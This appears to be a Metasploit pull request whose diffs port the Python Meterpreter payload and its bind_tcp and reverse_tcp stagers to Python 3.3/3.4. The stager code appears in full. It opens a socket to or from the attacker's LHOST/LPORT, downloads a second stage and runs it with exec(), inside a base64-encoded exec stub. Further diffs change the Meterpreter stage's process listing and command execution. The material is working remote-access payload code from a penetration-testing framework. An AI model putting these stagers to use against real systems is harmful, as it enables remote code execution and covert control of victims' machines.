### PR TITLE
Python Meterpreter Support For Python Versions 3.3/3.4

### DIFF
--- a/data/meterpreter/ext_server_stdapi.py
+++ b/data/meterpreter/ext_server_stdapi.py
@@ -753,14 +753,14 @@ def stdapi_sys_process_get_processes_via_proc(request, response):
 def stdapi_sys_process_get_processes_via_ps(request, response):
 	ps_args = ['ps', 'ax', '-w', '-o', 'pid,ppid,user,command']
 	proc_h = subprocess.Popen(ps_args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
-	ps_output = proc_h.stdout.read()
+	ps_output = str(proc_h.stdout.read())
 	ps_output = ps_output.split('\n')
 	ps_output.pop(0)
 	for process in ps_output:
 		process = process.split()
 		if len(process) < 4:
 			break
-		pgroup = ''
+		pgroup  = bytes()
 		pgroup += tlv_pack(TLV_TYPE_PID, int(process[0]))
 		pgroup += tlv_pack(TLV_TYPE_PARENT_PID, int(process[1]))
 		pgroup += tlv_pack(TLV_TYPE_USER_NAME, process[2])

--- a/data/meterpreter/ext_server_stdapi.py
+++ b/data/meterpreter/ext_server_stdapi.py
@@ -702,6 +702,7 @@ def stdapi_sys_process_execute(request, response):
 			proc_h.stderr = open(os.devnull, 'rb')
 		else:
 			proc_h = STDProcess(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
+			proc_h.echo_protection = True
 		proc_h.start()
 	else:
 		proc_h = subprocess.Popen(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
@@ -1207,7 +1208,7 @@ def stdapi_net_config_get_interfaces_via_windll_mib():
 	table_data = ctypes.string_at(table, pdwSize.value)
 	entries = struct.unpack('I', table_data[:4])[0]
 	table_data = table_data[4:]
-	for i in xrange(entries):
+	for i in range(entries):
 		addrrow = cstruct_unpack(MIB_IPADDRROW, table_data)
 		ifrow = MIB_IFROW()
 		ifrow.dwIndex = addrrow.dwIndex

--- a/data/meterpreter/meterpreter.py
+++ b/data/meterpreter/meterpreter.py
@@ -526,8 +526,7 @@ class PythonMeterpreter(object):
 			except Exception:
 				if DEBUGGING:
 					print('[-] method ' + handler_name + ' resulted in an error')
-					exc_type, exc_value, exc_traceback = sys.exc_info()
-					traceback.print_exception(exc_type, exc_value, exc_traceback, file=sys.stderr)
+					traceback.print_exc(file=sys.stderr)
 				result = ERROR_FAILURE
 		else:
 			if DEBUGGING:

--- a/data/meterpreter/meterpreter.py
+++ b/data/meterpreter/meterpreter.py
@@ -502,17 +502,17 @@ class PythonMeterpreter(object):
 			handler = self.extension_functions[handler_name]
 			try:
 				if DEBUGGING:
-					print("[*] running method {0}".format(handler_name))
+					print('[*] running method ' + handler_name)
 				result, resp = handler(request, resp)
 			except Exception:
 				if DEBUGGING:
-					print("[-] method {0} resulted in an error".format(handler_name))
+					print('[-] method ' + handler_name + ' resulted in an error')
 					exc_type, exc_value, exc_traceback = sys.exc_info()
 					traceback.print_exception(exc_type, exc_value, exc_traceback, file=sys.stderr)
 				result = ERROR_FAILURE
 		else:
 			if DEBUGGING:
-				print("[-] method {0} was requested but does not exist".format(handler_name))
+				print('[-] method ' + handler_name + ' was requested but does not exist')
 			result = ERROR_FAILURE
 		resp += tlv_pack(TLV_TYPE_RESULT, result)
 		resp = struct.pack('>I', len(resp) + 4) + resp

--- a/data/meterpreter/meterpreter.py
+++ b/data/meterpreter/meterpreter.py
@@ -510,6 +510,9 @@ class PythonMeterpreter(object):
 
 if not hasattr(os, 'fork') or (hasattr(os, 'fork') and os.fork() == 0):
 	if hasattr(os, 'setsid'):
-		os.setsid()
+		try:
+			os.setsid()
+		except OSError:
+			pass
 	met = PythonMeterpreter(s)
 	met.run()

--- a/data/meterpreter/meterpreter.py
+++ b/data/meterpreter/meterpreter.py
@@ -16,6 +16,9 @@ import subprocess
 import sys
 import threading
 
+if sys.version_info[0] < 3:
+	bytes = str
+
 #
 # Constants
 #
@@ -286,7 +289,7 @@ class PythonMeterpreter(object):
 					break
 				req_length, req_type = struct.unpack('>II', request)
 				req_length -= 8
-				request = ''
+				request = bytes()
 				while len(request) < req_length:
 					request += self.socket.recv(4096)
 				response = self.create_response(request)
@@ -487,7 +490,7 @@ class PythonMeterpreter(object):
 			try:
 				#print("[*] running method {0}".format(handler_name))
 				result, resp = handler(request, resp)
-			except Exception, err:
+			except Exception:
 				#print("[-] method {0} resulted in an error".format(handler_name))
 				result = ERROR_FAILURE
 		else:

--- a/modules/payloads/stagers/python/bind_tcp.rb
+++ b/modules/payloads/stagers/python/bind_tcp.rb
@@ -29,22 +29,24 @@ module Metasploit3
   # Constructs the payload
   #
   def generate
-    cmd = ''
     # Set up the socket
-    cmd += "import socket,struct\n"
-    cmd += "s=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2
-    cmd += "s.bind(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n"
-    cmd += "s.listen(1)\n"
-    cmd += "c,a=s.accept()\n"
-    cmd += "l=struct.unpack('>I',c.recv(4))[0]\n"
-    cmd += "d=c.recv(4096)\n"
-    cmd += "while len(d)!=l:\n"
-    cmd += "\td+=c.recv(4096)\n"
-    cmd += "exec(d,{'s':c})\n"
+    cmd  = "import socket,struct\n"
+    cmd << "s=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2
+    cmd << "s.bind(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n"
+    cmd << "s.listen(1)\n"
+    cmd << "c,a=s.accept()\n"
+    cmd << "l=struct.unpack('>I',c.recv(4))[0]\n"
+    cmd << "d=c.recv(4096)\n"
+    cmd << "while len(d)!=l:\n"
+    cmd << "\td+=c.recv(4096)\n"
+    cmd << "exec(d,{'s':c})\n"
 
     # Base64 encoding is required in order to handle Python's formatting requirements in the while loop
-    cmd = "import base64; exec(base64.b64decode('#{Rex::Text.encode_base64(cmd)}'))"
-    return cmd
+    b64_stub  = "import base64,sys; exec(base64.b64decode("
+    b64_stub << "(str if sys.version_info[0]==2 else lambda b:bytes(b,'UTF-8'))('"
+    b64_stub << Rex::Text.encode_base64(cmd)
+    b64_stub << "')))"
+    return b64_stub
   end
 
   def handle_intermediate_stage(conn, payload)

--- a/modules/payloads/stagers/python/bind_tcp.rb
+++ b/modules/payloads/stagers/python/bind_tcp.rb
@@ -15,7 +15,7 @@ module Metasploit3
   def initialize(info = {})
     super(merge_info(info,
       'Name'          => 'Python Bind TCP Stager',
-      'Description'   => 'Python connect stager',
+      'Description'   => 'Listen for a connection',
       'Author'        => 'Spencer McIntyre',
       'License'       => MSF_LICENSE,
       'Platform'      => 'python',

--- a/modules/payloads/stagers/python/bind_tcp.rb
+++ b/modules/payloads/stagers/python/bind_tcp.rb
@@ -43,7 +43,7 @@ module Metasploit3
 
     # Base64 encoding is required in order to handle Python's formatting requirements in the while loop
     b64_stub  = "import base64,sys; exec(base64.b64decode("
-    b64_stub << "(str if sys.version_info[0]==2 else lambda b:bytes(b,'UTF-8'))('"
+    b64_stub << "{2:str}.get(sys.version_info[0],lambda b:bytes(b,'UTF-8'))('"
     b64_stub << Rex::Text.encode_base64(cmd)
     b64_stub << "')))"
     return b64_stub

--- a/modules/payloads/stagers/python/bind_tcp.rb
+++ b/modules/payloads/stagers/python/bind_tcp.rb
@@ -22,7 +22,7 @@ module Metasploit3
       'Arch'          => ARCH_PYTHON,
       'Handler'       => Msf::Handler::BindTcp,
       'Stager'        => {'Payload' => ""}
-      ))
+    ))
   end
 
   #

--- a/modules/payloads/stagers/python/bind_tcp.rb
+++ b/modules/payloads/stagers/python/bind_tcp.rb
@@ -42,8 +42,8 @@ module Metasploit3
     cmd << "exec(d,{'s':c})\n"
 
     # Base64 encoding is required in order to handle Python's formatting requirements in the while loop
-    b64_stub  = "import base64,sys; exec(base64.b64decode("
-    b64_stub << "{2:str}.get(sys.version_info[0],lambda b:bytes(b,'UTF-8'))('"
+    b64_stub  = "import base64,sys;exec(base64.b64decode("
+    b64_stub << "{2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('"
     b64_stub << Rex::Text.encode_base64(cmd)
     b64_stub << "')))"
     return b64_stub

--- a/modules/payloads/stagers/python/reverse_tcp.rb
+++ b/modules/payloads/stagers/python/reverse_tcp.rb
@@ -40,8 +40,8 @@ module Metasploit3
     cmd << "exec(d,{'s':s})\n"
 
     # Base64 encoding is required in order to handle Python's formatting requirements in the while loop
-    b64_stub  = "import base64,sys; exec(base64.b64decode("
-    b64_stub << "{2:str}.get(sys.version_info[0],lambda b:bytes(b,'UTF-8'))('"
+    b64_stub  = "import base64,sys;exec(base64.b64decode("
+    b64_stub << "{2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('"
     b64_stub << Rex::Text.encode_base64(cmd)
     b64_stub << "')))"
     return b64_stub

--- a/modules/payloads/stagers/python/reverse_tcp.rb
+++ b/modules/payloads/stagers/python/reverse_tcp.rb
@@ -29,20 +29,22 @@ module Metasploit3
   # Constructs the payload
   #
   def generate
-    cmd = ''
     # Set up the socket
-    cmd += "import socket,struct\n"
-    cmd += "s=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2
-    cmd += "s.connect(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n"
-    cmd += "l=struct.unpack('>I',s.recv(4))[0]\n"
-    cmd += "d=s.recv(4096)\n"
-    cmd += "while len(d)!=l:\n"
-    cmd += "\td+=s.recv(4096)\n"
-    cmd += "exec(d,{'s':s})\n"
+    cmd  = "import socket,struct\n"
+    cmd << "s=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2
+    cmd << "s.connect(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n"
+    cmd << "l=struct.unpack('>I',s.recv(4))[0]\n"
+    cmd << "d=s.recv(4096)\n"
+    cmd << "while len(d)!=l:\n"
+    cmd << "\td+=s.recv(4096)\n"
+    cmd << "exec(d,{'s':s})\n"
 
     # Base64 encoding is required in order to handle Python's formatting requirements in the while loop
-    cmd = "import base64; exec(base64.b64decode('#{Rex::Text.encode_base64(cmd)}'))"
-    return cmd
+    b64_stub  = "import base64,sys; exec(base64.b64decode("
+    b64_stub << "(str if sys.version_info[0]==2 else lambda b:bytes(b,'UTF-8'))('"
+    b64_stub << Rex::Text.encode_base64(cmd)
+    b64_stub << "')))"
+    return b64_stub
   end
 
   def handle_intermediate_stage(conn, payload)

--- a/modules/payloads/stagers/python/reverse_tcp.rb
+++ b/modules/payloads/stagers/python/reverse_tcp.rb
@@ -41,7 +41,7 @@ module Metasploit3
 
     # Base64 encoding is required in order to handle Python's formatting requirements in the while loop
     b64_stub  = "import base64,sys; exec(base64.b64decode("
-    b64_stub << "(str if sys.version_info[0]==2 else lambda b:bytes(b,'UTF-8'))('"
+    b64_stub << "{2:str}.get(sys.version_info[0],lambda b:bytes(b,'UTF-8'))('"
     b64_stub << Rex::Text.encode_base64(cmd)
     b64_stub << "')))"
     return b64_stub

--- a/modules/payloads/stagers/python/reverse_tcp.rb
+++ b/modules/payloads/stagers/python/reverse_tcp.rb
@@ -22,7 +22,7 @@ module Metasploit3
       'Arch'          => ARCH_PYTHON,
       'Handler'       => Msf::Handler::ReverseTcp,
       'Stager'        => {'Payload' => ""}
-      ))
+    ))
   end
 
   #

--- a/modules/payloads/stagers/python/reverse_tcp.rb
+++ b/modules/payloads/stagers/python/reverse_tcp.rb
@@ -15,7 +15,7 @@ module Metasploit3
   def initialize(info = {})
     super(merge_info(info,
       'Name'          => 'Python Reverse TCP Stager',
-      'Description'   => 'Reverse Python connect back stager',
+      'Description'   => 'Connect back to the attacker',
       'Author'        => 'Spencer McIntyre',
       'License'       => MSF_LICENSE,
       'Platform'      => 'python',

--- a/modules/payloads/stages/python/meterpreter.rb
+++ b/modules/payloads/stages/python/meterpreter.rb
@@ -20,7 +20,8 @@ module Metasploit3
       'Platform'      => 'python',
       'Arch'          => ARCH_PYTHON,
       'License'       => MSF_LICENSE,
-      'Session'       => Msf::Sessions::Meterpreter_Python_Python))
+      'Session'       => Msf::Sessions::Meterpreter_Python_Python
+    ))
   end
 
   def generate_stage

--- a/modules/payloads/stages/python/meterpreter.rb
+++ b/modules/payloads/stages/python/meterpreter.rb
@@ -8,7 +8,6 @@ require 'msf/core/handler/reverse_tcp'
 require 'msf/base/sessions/meterpreter_python'
 require 'msf/base/sessions/meterpreter_options'
 
-
 module Metasploit3
   include Msf::Sessions::MeterpreterOptions
 

--- a/modules/payloads/stages/python/meterpreter.rb
+++ b/modules/payloads/stages/python/meterpreter.rb
@@ -22,6 +22,9 @@ module Metasploit3
       'License'       => MSF_LICENSE,
       'Session'       => Msf::Sessions::Meterpreter_Python_Python
     ))
+    register_advanced_options([
+      OptBool.new('DEBUGGING', [ true, "Enable debugging for the Python meterpreter", false ])
+    ], self.class)
   end
 
   def generate_stage
@@ -30,6 +33,11 @@ module Metasploit3
     met = File.open(file, "rb") {|f|
       f.read(f.stat.size)
     }
+
+    if datastore['DEBUGGING']
+      met = met.sub("DEBUGGING = False", "DEBUGGING = True")
+    end
+
     met
   end
 end

--- a/modules/payloads/stages/python/meterpreter.rb
+++ b/modules/payloads/stages/python/meterpreter.rb
@@ -14,8 +14,11 @@ module Metasploit3
   def initialize(info = {})
     super(update_info(info,
       'Name'          => 'Python Meterpreter',
-      'Description'   => 'Run a meterpreter server in Python',
-      'Author'        => ['Spencer McIntyre'],
+      'Description'    => %q{
+        Run a meterpreter server in Python. Supported Python versions
+        are 2.5 - 2.7 and 3.1 - 3.4.
+      },
+      'Author'        => 'Spencer McIntyre',
       'Platform'      => 'python',
       'Arch'          => ARCH_PYTHON,
       'License'       => MSF_LICENSE,


### PR DESCRIPTION
## Summary

This adds support to the Python Meterpreter for Python versions 3.3 and 3.4.

Older versions of Python (3.1/3.2) do not work with the current stagers due to the `base64.b64decode` function not tolerating a string type argument like the newer versions will. Ideally systems with Python 3.1 and 3.2 installed will still be using a Python 2.x version by default.

The post/test/meterpreter, post/test/file and post/test/registry checks should all pass on all tested versions unless otherwise noted below.

Tested Python Versions:
- Linux 2.4 (getting ip addresses will fail due to a lack of ctypes)
- Linux 2.7
- Linux 3.3
- Linux 3.4
- OSX 2.7
- OSX 3.4 (Missing SystemConfiguration by default, getting ip addresses will fail)
- Windows XP 2.5
- Windows XP 2.7
- Windows 7 2.7
- Windows 7 3.4
## PR Verification Steps
- [x] Test Meterpreter with Python 3.3/3.4
  - [x] Test on Linux
  - [x] Test on OSX
  - [x] Test on Windows
- [x] Ensure Meterpreter still functions and checks pass with Python 2.5+
